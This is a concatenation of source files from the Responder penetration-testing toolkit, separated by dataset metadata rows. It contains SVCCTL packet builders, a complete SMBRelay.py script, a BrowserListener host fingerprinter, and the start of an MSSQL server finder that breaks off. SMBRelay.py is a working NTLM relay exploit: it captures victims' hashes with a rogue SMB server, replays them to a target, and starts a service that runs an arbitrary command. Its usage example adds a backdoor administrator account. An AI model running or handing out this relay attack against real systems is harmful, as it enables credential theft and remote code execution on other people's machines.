        ("ActualCountRefID", "\x11\x00\x00\x00"),
        ("DisplayNameID", "DhhUFcsvrfJvLwRq"),  # randomized by the caller
        ("DisplayNameIDNull", "\x00\x00\x00\x00"),
        ("AccessMask", "\xff\x01\x0f\x00"),
        ("ServerType", "\x10\x01\x00\x00"),
        ("ServiceStartType", "\x03\x00\x00\x00"),  # demand start
        ("ServiceErrorCtl", "\x00\x00\x00\x00"),
        ("BinPathMaxCount", "\xb6\x00\x00\x00"),
        ("BinPathOffset", "\x00\x00\x00\x00"),
        ("BinPathActualCount", "\xb6\x00\x00\x00"),
        ("BinPathName", "%COMSPEC% /C \""),
        ("BinCMD", ""),            # the actual command to execute
        ("BintoEnd", "\""),
        ("BinPathNameNull", "\x00\x00"),
        ("Nullz", "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
    ])
    def calculate(self):
        BinDataLen = str(self.fields["BinPathName"])+str(self.fields["BinCMD"])+str(self.fields["BintoEnd"])
        ## Calculate first
        # NDR conformant-string counts include the NUL terminator (+1),
        # and must be computed on the pre-UTF-16 character counts.
        self.fields["BinPathMaxCount"] = struct.pack("<i",len(BinDataLen)+1)
        self.fields["BinPathActualCount"] = struct.pack("<i",len(BinDataLen)+1)
        self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
        self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
        self.fields["MaxCountRefID"] = struct.pack("<i",len(str(self.fields["DisplayNameID"]))+1)
        self.fields["ActualCountRefID"] = struct.pack("<i",len(str(self.fields["DisplayNameID"]))+1)
        ## Then convert to UTF-16LE, yeah it's weird..
        self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le')
        self.fields["DisplayNameID"] = self.fields["DisplayNameID"].encode('utf-16le')
        self.fields["BinPathName"] = self.fields["BinPathName"].encode('utf-16le')
        self.fields["BinCMD"] = self.fields["BinCMD"].encode('utf-16le')
        self.fields["BintoEnd"] = self.fields["BintoEnd"].encode('utf-16le')
class SMBDCESVCCTLOpenService(Packet):
    # Stub data for SVCCTL OpenServiceW: reopens the service created by
    # CreateServiceW so it can be started.
    fields = OrderedDict([
        ("ContextHandle", ""),     # SCM handle from OpenSCManagerW
        ("MaxCount", "\x0c\x00\x00\x00"),
        ("Offset", "\x00\x00\x00\x00"),
        ("ActualCount", "\x0c\x00\x00\x00"),
        ("ServiceName", ""),
        ("MachineNameNull", "\x00\x00"),
        ("AccessMask", "\xff\x01\x0f\x00"),
    ])
    def calculate(self):
        ## Calculate first
        # String counts include the NUL terminator and are measured before
        # the UTF-16 conversion doubles the byte length.
        self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
        self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
        ## Then convert to UTF-16LE, yeah it's weird..
        self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le')
class SMBDCESVCCTLStartService(Packet):
    # Stub data for SVCCTL StartServiceW: just the service handle plus
    # zero start arguments.
    fields = OrderedDict([
        ("ContextHandle", ""),     # service handle from OpenServiceW
        ("MaxCount", "\x00\x00\x00\x00\x00\x00\x00\x00"),
    ])
def ParseAnswerKey(data,host):
    """Extract the 8-byte NTLM challenge from a Negotiate Protocol response.

    NOTE(review): offset 73 assumes a fixed-layout SMB1 negotiate response
    (extended security off) -- confirm against a capture.
    """
    key = data[73:81]
    print "Key retrieved is:%s from host:%s"%(key.encode("hex"),host)
    return key
| 15,323 | Python | .py | 308 | 42 | 649 | 0.558627 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,394 | SMBRelay.py | SpiderLabs_Responder/tools/SMBRelay.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import random
import optparse
import thread
sys.path.append('../')
from fingerprint import RunSmbFinger
from socket import *
from RelayPackets import *
from packets import *
from servers.SMB import *
from packets import Packet
import logging
# Session log used by ReadData()/RunRelay() to remember which client/user
# combinations already failed or which commands already ran. filemode="w"
# truncates the log on every start, so the memory only spans one run.
Logs = logging
Logs.basicConfig(filemode="w",filename='SMBRelay-Session.txt',format='',level=logging.DEBUG)
def longueur(payload):
    """Return the 4-byte big-endian NetBIOS length prefix for payload.

    payload is an iterable of strings (or a single string); the prefix
    encodes the total byte length of the concatenation.
    """
    total = sum(len(chunk) for chunk in payload)
    return struct.pack(">i", total)
def UserCallBack(op, value, dmy, parser):
    """optparse callback for -u: greedily collect the remaining usernames.

    Consumes every remaining command-line token that does not look like an
    option flag, appending any usernames gathered by a previous -u so the
    option can be repeated.
    """
    args=[]
    for arg in parser.rargs:
        # startswith instead of arg[0]: the old indexing raised IndexError
        # on an empty-string argv token.
        if not arg.startswith("-"):
            args.append(arg)
    if getattr(parser.values, op.dest):
        args.extend(getattr(parser.values, op.dest))
    setattr(parser.values, op.dest, args)
# Command-line interface: -c (command) / -t (target) / -u (users) are
# mandatory; -i and -d are optional. Successfully parsed values are
# promoted to module globals consumed by RunRelay() and ReadData().
parser = optparse.OptionParser(usage="python %prog -i 10.20.30.40 -c 'net user Responder Quol0eeP/e}X /add &&net localgroup administrators Responder /add' -t 10.20.30.45 -u Administrator lgandx admin", prog=sys.argv[0],)
parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="Responder_IP")
parser.add_option('-c',action='store', help='Command to run on the target.',metavar='"net user Responder Quol0eeP/e}X /ADD"',dest='CMD')
parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
parser.add_option('-d',action="store", help="Target Domain for SMB relay (optional). This can be set to overwrite a domain logon (DOMAIN\Username) with the gathered credentials. Woks on NTLMv1",metavar="WORKGROUP",dest="Domain")
# -u uses a callback so it can swallow several usernames in a row.
parser.add_option('-u', '--UserToRelay', action="callback", callback=UserCallBack, dest="UserToRelay")
options, args = parser.parse_args()
if options.CMD is None:
    print "\n-c mandatory option is missing, please provide a command to execute on the target.\n"
    parser.print_help()
    exit(-1)
elif options.TARGET is None:
    print "\n-t mandatory option is missing, please provide a target.\n"
    parser.print_help()
    exit(-1)
elif options.UserToRelay is None:
    print "\n-u mandatory option is missing, please provide a username to relay.\n"
    parser.print_help()
    exit(-1)
ResponderPATH = os.path.dirname(__file__)
UserToRelay = options.UserToRelay
Domain = options.Domain
Command = options.CMD
Target = options.TARGET
Responder_IP = options.Responder_IP
print "\nResponder SMBRelay 0.1\nPlease send bugs/comments to: laurent.gaffie@gmail.com"
print '\033[31m'+'Use this script in combination with Responder.py for best results (remember to set SMB = Off in Responder.conf)..\nUsernames to relay (-u) are case sensitive.'+'\033[0m'
print 'To kill this script hit CRTL-C or Enter\nWill relay credentials for these users: '+'\033[1m\033[34m'+', '.join(UserToRelay)+'\033[0m\n'
#Function used to verify if a previous auth attempt was made.
def ReadData(outfile,Client, User, cmd=None):
try:
with open(ResponderPATH+outfile,"r") as filestr:
if cmd is None:
String = Client+':'+User
if re.search(String.encode('hex'), filestr.read().encode('hex')):
return True
return False
if cmd is not None:
String = Client+","+User+","+cmd
if re.search(String.encode('hex'), filestr.read().encode('hex')):
print "[+] Command: %s was previously executed on host: %s. Won't execute again.\n" %(cmd, Client)
return True
return False
except:
raise
#Function used to parse SMB NTLMv1/v2
def ParseHash(data,Client, Target):
    """Parse a Session Setup AndX request and extract LM/NTLM credentials.

    Distinguishes NTLMv2 (NT response >= 30 bytes) from NTLMv1 (exactly 24
    bytes). For a user listed in UserToRelay, returns
    (LMHash, NTHash, Username, Domain, ClientIP); otherwise returns None
    implicitly. Offsets below follow the fixed SMB1 SessionSetup layout.
    """
    try:
        lenght = struct.unpack('<H',data[43:45])[0]
        LMhashLen = struct.unpack('<H',data[51:53])[0]
        NthashLen = struct.unpack('<H',data[53:55])[0]
        Bcc = struct.unpack('<H',data[63:65])[0]
        if NthashLen >= 30:
            # NTLMv2: hash blob follows the LM response; account/domain are
            # the first two UTF-16 strings after the security blob.
            Hash = data[65+LMhashLen:65+LMhashLen+NthashLen]
            pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
            var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
            Username, Domain = tuple(var)
            if ReadData("SMBRelay-Session.txt", Client, Username):
                print "[+]Auth from user %s with host %s previously failed. Won't relay."%(Username, Client)
            if Username in UserToRelay:
                print '%s sent a NTLMv2 Response..\nVictim OS is : %s. Passing credentials to: %s'%(Client,RunSmbFinger((Client, 445)),Target)
                print "Username : ",Username
                print "Domain (if joined, if not then computer name) : ",Domain
                return data[65:65+LMhashLen],data[65+LMhashLen:65+LMhashLen+NthashLen],Username,Domain, Client
        if NthashLen == 24:
            # NTLMv1: 24-byte LM and NT responses.
            pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
            var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
            Username, Domain = tuple(var)
            if ReadData("SMBRelay-Session.txt", Client, Username):
                print "Auth from user %s with host %s previously failed. Won't relay."%(Username, Client)
            if Username in UserToRelay:
                print '%s sent a NTLMv1 Response..\nVictim OS is : %s. Passing credentials to: %s'%(Client,RunSmbFinger((Client, 445)),Target)
                LMHashing = data[65:65+LMhashLen].encode('hex').upper()
                NTHashing = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
                print "Username : ",Username
                print "Domain (if joined, if not then computer name) : ",Domain
                return data[65:65+LMhashLen],data[65+LMhashLen:65+LMhashLen+NthashLen],Username,Domain, Client
            else:
                print "'%s' user was not specified in -u option, won't relay authentication. Allowed users to relay are: %s"%(Username,UserToRelay)
    except Exception:
        raise
#Detect if SMB auth was Anonymous
def Is_Anonymous(data):
LMhashLen = struct.unpack('<H',data[51:53])[0]
if LMhashLen == 0 or LMhashLen == 1:
print "SMB Anonymous login requested, trying to force client to auth with credz."
return True
return False
def ParseDomain(data):
    """Return the domain/workstation field starting at offset 81, keeping
    its triple-null terminator so it can be replayed verbatim."""
    domain = data[81:].split('\x00\x00\x00')[0]
    return domain + '\x00\x00\x00'
#Function used to know which dialect number to return for NT LM 0.12
def Parse_Nego_Dialect(data):
    """Find "NT LM 0.12" in a Negotiate Protocol request and return its
    dialect index as a 2-byte little-endian string ("\\x00\\x00".."\\x0a\\x00").

    Dialect entries start at offset 40, each prefixed with a 0x02
    buffer-format byte and NUL-terminated. Returns None when the dialect is
    not among the first 11 entries. The original if-chain read test[10]
    after slicing the list to 10 elements (guaranteed IndexError) and also
    crashed whenever the client offered fewer than 11 dialects.
    """
    dialects = [entry.replace('\x00', '') for entry in data[40:].split('\x02')[:11]]
    for index, dialect in enumerate(dialects):
        if dialect == "NT LM 0.12":
            return chr(index) + "\x00"
    return None
def SmbRogueSrv139(key,Target,DomainMachineName):
    """Rogue SMB server on TCP 139 that replays our challenge key.

    Accepts one client, answers the NetBIOS session request and protocol
    negotiation (echoing the Target's challenge key so the client's hash is
    usable against it), then rejects the Session Setup while harvesting the
    credentials from it. Returns the tuple from ParseHash(), or None on any
    error.
    """
    s = socket(AF_INET,SOCK_STREAM)
    s.setsockopt(SOL_SOCKET,SO_REUSEADDR, 1)
    s.settimeout(30)
    try:
        s.bind(('0.0.0.0', 139))
        s.listen(0)
        conn, addr = s.accept()
    except error, msg:
        if "Address already in use" in msg:
            print '\033[31m'+'Something is already listening on TCP 139, did you set SMB = Off in Responder.conf..?\nSMB Relay will not work.'+'\033[0m'
    try:
        while True:
            data = conn.recv(1024)
            ##session request 139
            if data[0] == "\x81":
                # 0x82 = positive session response.
                buffer0 = "\x82\x00\x00\x00"
                conn.send(buffer0)
            ##Negotiate proto answer.
            if data[8:10] == "\x72\x00":
                # Answer with the challenge key captured from the relay target.
                head = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x53\xc8",pid=pidcalc(data),tid=tidcalc(data))
                t = SMBNegoAns(Dialect=Parse_Nego_Dialect(data),Key=key,Domain=DomainMachineName)
                t.calculate()
                packet1 = str(head)+str(t)
                buffer1 = longueur(packet1)+packet1
                conn.send(buffer1)
            ##Session Setup AndX Request
            if data[8:10] == "\x73\x00":
                if Is_Anonymous(data):
                    # STATUS_INSUFF_SERVER_RESOURCES to force a real logon.
                    head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
                    packet1 = str(head)+str(SMBSessEmpty())
                    buffer1 = longueur(packet1)+packet1
                    conn.send(buffer1)
                else:
                    head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xC0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
                    packet1 = str(head)+str(SMBSessEmpty())#Return login fail anyways.
                    buffer1 = longueur(packet1)+packet1
                    conn.send(buffer1)
                    Credz = ParseHash(data,addr[0],Target)
                    return Credz
    except:
        return None
def RunRelay(host, Command,Domain):
    """Relay one victim authentication to `host` and PSexec `Command`.

    Flow: negotiate with the target to grab its challenge key, hand that
    key to the rogue TCP/139 server so a victim authenticates against it,
    replay the captured hashes to the target, then open \\svcctl over IPC$
    and drive the Service Control Manager (bind, OpenSCManagerW,
    CreateServiceW, OpenServiceW, StartServiceW) to run the command.
    Each nested `if data[8:10] == ...` gates on the previous response's
    SMB command/status bytes, so any failed stage drops out of the chain.
    Returns True on success, False/None otherwise.
    """
    Target = host
    CMD = Command
    print "Target is running: ", RunSmbFinger((host, 445))
    # Stage 0: negotiate with the relay target to obtain its challenge key.
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, 445))
    h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x03\xc7",pid="\xff\xfe", tid="\xff\xff")
    n = SMBNego(Data = SMBNegoData())
    n.calculate()
    packet0 = str(h)+str(n)
    buffer0 = longueur(packet0)+packet0
    s.send(buffer0)
    data = s.recv(2048)
    Key = ParseAnswerKey(data,host)
    DomainMachineName = ParseDomain(data)
    if data[8:10] == "\x72\x00":
        try:
            # Stage 1: wait for a victim on our rogue 139 server and harvest
            # hashes computed against the target's own challenge.
            a = SmbRogueSrv139(Key,Target,DomainMachineName)
            if a is not None:
                LMHash,NTHash,Username,OriginalDomain, CLIENTIP = a
                if Domain is None:
                    Domain = OriginalDomain
                # Skip if this exact command already ran on the target.
                if ReadData("SMBRelay-Session.txt", Target, Username, CMD):
                    pass
                else:
                    # Stage 2: replay the captured hashes (session setup +
                    # tree connect to IPC$) in one chained request.
                    head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x03\xc8",pid="\xff\xfe",mid="\x01\x00")
                    t = SMBSessionTreeData(AnsiPasswd=LMHash,UnicodePasswd=NTHash,Username=Username,Domain=Domain,Targ=Target)
                    t.calculate()
                    packet0 = str(head)+str(t)
                    buffer1 = longueur(packet0)+packet0
                    s.send(buffer1)
                    data = s.recv(2048)
        except:
            raise
        a = None
    # NOTE(review): CLIENTIP/Username are only bound when a victim actually
    # authenticated; these failure branches NameError otherwise.
    if data[8:10] == "\x73\x6d":
        print "[+] Relay failed, auth denied. This user doesn't have an account on this target."
        Logs.info(CLIENTIP+":"+Username)
    if data[8:10] == "\x73\x0d":
        print "[+] Relay failed, SessionSetupAndX returned invalid parameter. It's most likely because both client and server are >=Windows Vista"
        Logs.info(CLIENTIP+":"+Username)
    ## NtCreateAndx
    if data[8:10] == "\x73\x00":
        # Stage 3: authenticated -- open the \svcctl pipe.
        print "[+] Authenticated, trying to PSexec on target !"
        head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x03\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
        t = SMBNTCreateData()
        t.calculate()
        packet0 = str(head)+str(t)
        buffer1 = longueur(packet0)+packet0
        s.send(buffer1)
        data = s.recv(2048)
        ## Fail Handling.
        if data[8:10] == "\xa2\x22":
            print "[+] Exploit failed, NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation?"
        ## DCE/RPC Write.
        if data[8:10] == "\xa2\x00":
            # Stage 4: bind the SVCCTL interface over the pipe.
            head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
            x = SMBDCEData()
            x.calculate()
            f = data[42:44]  # pipe FID from the NT Create response
            t = SMBWriteData(FID=f,Data=x)
            t.calculate()
            packet0 = str(head)+str(t)
            buffer1 = longueur(packet0)+packet0
            s.send(buffer1)
            data = s.recv(2048)
            ## DCE/RPC Read.
            if data[8:10] == "\x2f\x00":
                head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x05\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                t = SMBReadData(FID=f)
                t.calculate()
                packet0 = str(head)+str(t)
                buffer1 = longueur(packet0)+packet0
                s.send(buffer1)
                data = s.recv(2048)
                ## DCE/RPC SVCCTLOpenManagerW.
                if data[8:10] == "\x2e\x00":
                    # Stage 5: OpenSCManagerW.
                    head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                    w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x03\x00")
                    w.calculate()
                    x = SMBDCEPacketData(Data=w)
                    x.calculate()
                    t = SMBWriteData(FID=f,Data=x)
                    t.calculate()
                    packet0 = str(head)+str(t)
                    buffer1 = longueur(packet0)+packet0
                    s.send(buffer1)
                    data = s.recv(2048)
                    ## DCE/RPC Read Answer.
                    if data[8:10] == "\x2f\x00":
                        head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                        t = SMBReadData(FID=f)
                        t.calculate()
                        packet0 = str(head)+str(t)
                        buffer1 = longueur(packet0)+packet0
                        s.send(buffer1)
                        data = s.recv(2048)
                        ## DCE/RPC SVCCTLCreateService.
                        if data[8:10] == "\x2e\x00":
                            # Trailing DWORD 5 = ERROR_ACCESS_DENIED.
                            if data[len(data)-4:] == "\x05\x00\x00\x00":
                                print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?"
                            # Stage 6: CreateServiceW with randomized names;
                            # binary path runs CMD through %COMSPEC%.
                            print "[+] Creating service"
                            head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                            ContextHandler = data[88:108]
                            ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)])
                            ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)])
                            FileChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.bat'
                            w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars,ReferentID="\x21\x03\x03\x00",BinCMD=CMD)
                            w.calculate()
                            x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w)
                            x.calculate()
                            t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
                            t.calculate()
                            packet0 = str(head)+str(t)
                            buffer1 = longueur(packet0)+packet0
                            s.send(buffer1)
                            data = s.recv(2048)
                            ## DCE/RPC Read Answer.
                            if data[8:10] == "\x2f\x00":
                                head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
                                t.calculate()
                                packet0 = str(head)+str(t)
                                buffer1 = longueur(packet0)+packet0
                                s.send(buffer1)
                                data = s.recv(2048)
                                ## DCE/RPC SVCCTLOpenService.
                                if data[8:10] == "\x2e\x00":
                                    if data[len(data)-4:] == "\x05\x00\x00\x00":
                                        print "[+] Failed to create the service"
                                    # Stage 7: OpenServiceW on the new service.
                                    head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                    w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
                                    w.calculate()
                                    x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
                                    x.calculate()
                                    t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
                                    t.calculate()
                                    packet0 = str(head)+str(t)
                                    buffer1 = longueur(packet0)+packet0
                                    s.send(buffer1)
                                    data = s.recv(2048)
                                    ## DCE/RPC Read Answer.
                                    if data[8:10] == "\x2f\x00":
                                        head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                        t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
                                        t.calculate()
                                        packet0 = str(head)+str(t)
                                        buffer1 = longueur(packet0)+packet0
                                        s.send(buffer1)
                                        data = s.recv(2048)
                                        ## DCE/RPC SVCCTLStartService.
                                        if data[8:10] == "\x2e\x00":
                                            if data[len(data)-4:] == "\x05\x00\x00\x00":
                                                print "[+] Failed to open the service"
                                            # Stage 8: StartServiceW -> runs the command.
                                            ContextHandler = data[88:108]
                                            head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                            w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
                                            x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
                                            x.calculate()
                                            t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
                                            t.calculate()
                                            packet0 = str(head)+str(t)
                                            buffer1 = longueur(packet0)+packet0
                                            s.send(buffer1)
                                            data = s.recv(2048)
                                            ## DCE/RPC Read Answer.
                                            if data[8:10] == "\x2f\x00":
                                                head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                                t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
                                                t.calculate()
                                                packet0 = str(head)+str(t)
                                                buffer1 = longueur(packet0)+packet0
                                                s.send(buffer1)
                                                data = s.recv(2048)
                                                if data[8:10] == "\x2e\x00":
                                                    print "[+] Command successful !"
                                                    Logs.info('Command successful:')
                                                    Logs.info(Target+","+Username+','+CMD)
                                                    return True
                                                if data[8:10] != "\x2e\x00":
                                                    return False
def RunInloop(Target,Command,Domain):
    """Relay authentications to Target forever, one victim at a time.

    The original wrapped the loop in a no-op ``try/except: raise`` and
    bound the (unused) return value to ``worker``; both removed with no
    behavior change.
    """
    while True:
        RunRelay(Target,Command,Domain)
def main():
	# Entry point: spawn the endless relay loop on a background thread
	# (Python 2 'thread' module) so the foreground can catch Ctrl-C.
	try:
		thread.start_new(RunInloop,(Target,Command,Domain))
	except KeyboardInterrupt:
		exit()
if __name__ == '__main__':
	try:
		main()
	except KeyboardInterrupt:
		raise
		# NOTE(review): unreachable — the bare 'raise' above re-raises before
		# raw_input() can execute; presumably meant to pause before exit.
		raw_input()
| 21,375 | Python | .py | 398 | 39.085427 | 228 | 0.544743 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,395 | BrowserListener.py | SpiderLabs_Responder/tools/BrowserListener.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import thread
BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
sys.path.insert(0, BASEDIR)
from servers.Browser import WorkstationFingerPrint, RequestType, RAPThisDomain, RapFinger
from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
from threading import Lock
from utils import *
def ParseRoles(data):
	"""Decode the 4-byte server-type bitmask of a Browser announcement
	into a comma-separated list of advertised role names.
	Returns '' when *data* is not exactly 4 bytes."""
	if len(data) != 4:
		return ''
	# (label, byte index, bit position) for every advertised role flag,
	# listed in the same order the roles are reported.
	flag_table = (
		('Workstation', 0, 0), ('Server', 0, 1), ('SQL', 0, 2),
		('Domain Controller', 0, 3), ('Backup Controller', 0, 4),
		('Time Source', 0, 5), ('Apple', 0, 6), ('Novell', 0, 7),
		('Member', 1, 0), ('Print', 1, 1), ('Dialin', 1, 2),
		('Xenix', 1, 3), ('NT Workstation', 1, 4), ('WfW', 1, 5),
		('Unused', 1, 6), ('NT Server', 1, 7),
		('Potential Browser', 2, 0), ('Backup Browser', 2, 1),
		('Master Browser', 2, 2), ('Domain Master Browser', 2, 3),
		('OSF', 2, 4), ('VMS', 2, 5), ('Windows 95+', 2, 6), ('DFS', 2, 7),
		('Local', 3, 6), ('Domain Enum', 3, 7),
	)
	return ', '.join(label for label, byte, bit in flag_table
	                 if (ord(data[byte]) >> bit) & 1)
class BrowserListener(BaseRequestHandler):
	"""UDP/138 handler: decodes a Browser-service datagram, prints its
	fields, then RAP-enumerates the domain it advertises."""
	def handle(self):
		data, socket = self.request
		# NOTE(review): a freshly created local Lock cannot synchronize
		# anything across handler threads — presumably meant to be shared.
		lock = Lock()
		lock.acquire()
		# Offset of the mailslot payload inside the SMB Trans request,
		# then the Browser frame itself (command byte first).
		DataOffset = struct.unpack('<H',data[139:141])[0]
		BrowserPacket = data[82+DataOffset:]
		ReqType = RequestType(BrowserPacket[0])
		# NetBIOS-encoded names and roles from the datagram header.
		Domain = Decode_Name(data[49:81])
		Name = Decode_Name(data[15:47])
		Role1 = NBT_NS_Role(data[45:48])
		Role2 = NBT_NS_Role(data[79:82])
		# OS version bytes and the 4-byte server-type bitmask.
		Fprint = WorkstationFingerPrint(data[190:192])
		Roles = ParseRoles(data[192:196])
		print text("[BROWSER] Request Type : %s" % ReqType)
		print text("[BROWSER] Address : %s" % self.client_address[0])
		print text("[BROWSER] Domain : %s" % Domain)
		print text("[BROWSER] Name : %s" % Name)
		print text("[BROWSER] Main Role : %s" % Role1)
		print text("[BROWSER] 2nd Role : %s" % Role2)
		print text("[BROWSER] Fingerprint : %s" % Fprint)
		print text("[BROWSER] Role List : %s" % Roles)
		# Follow up with RAP NetServerEnum queries against the sender.
		RAPThisDomain(self.client_address[0], Domain)
		lock.release()
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
	# Threaded UDP server that sets SO_REUSEADDR before binding, so the
	# listener can share/rebind port 138 alongside other NetBIOS services.
	def server_bind(self):
		self.allow_reuse_address = 1
		UDPServer.server_bind(self)
def serve_thread_udp_broadcast(host, port, handler):
	# Run a threaded UDP server forever on *port*.
	# NOTE(review): the 'host' argument is ignored — it always binds '' (all
	# interfaces), which is what broadcast datagram reception requires.
	try:
		server = ThreadingUDPServer(('', port), handler)
		server.serve_forever()
	except:
		print "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
if __name__ == "__main__":
	try:
		print "Listening for BROWSER datagrams..."
		# Serve UDP/138 on a background thread; keep the main thread in a
		# sleep loop so Ctrl-C is caught here and exits cleanly.
		thread.start_new(serve_thread_udp_broadcast,('', 138, BrowserListener))
		while True:
			time.sleep(1)
	except KeyboardInterrupt:
		sys.exit("\r Exiting...")
21,396 | FindSQLSrv.py | SpiderLabs_Responder/tools/FindSQLSrv.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from socket import *

print 'MSSQL Server Finder 0.1'

# SSRP discovery: broadcast a single CLNT_BCAST_EX (0x02) byte to UDP/1434;
# every SQL Server Browser service on the subnet replies with its instance
# list in cleartext.
s = socket(AF_INET,SOCK_DGRAM)
s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
s.settimeout(2)
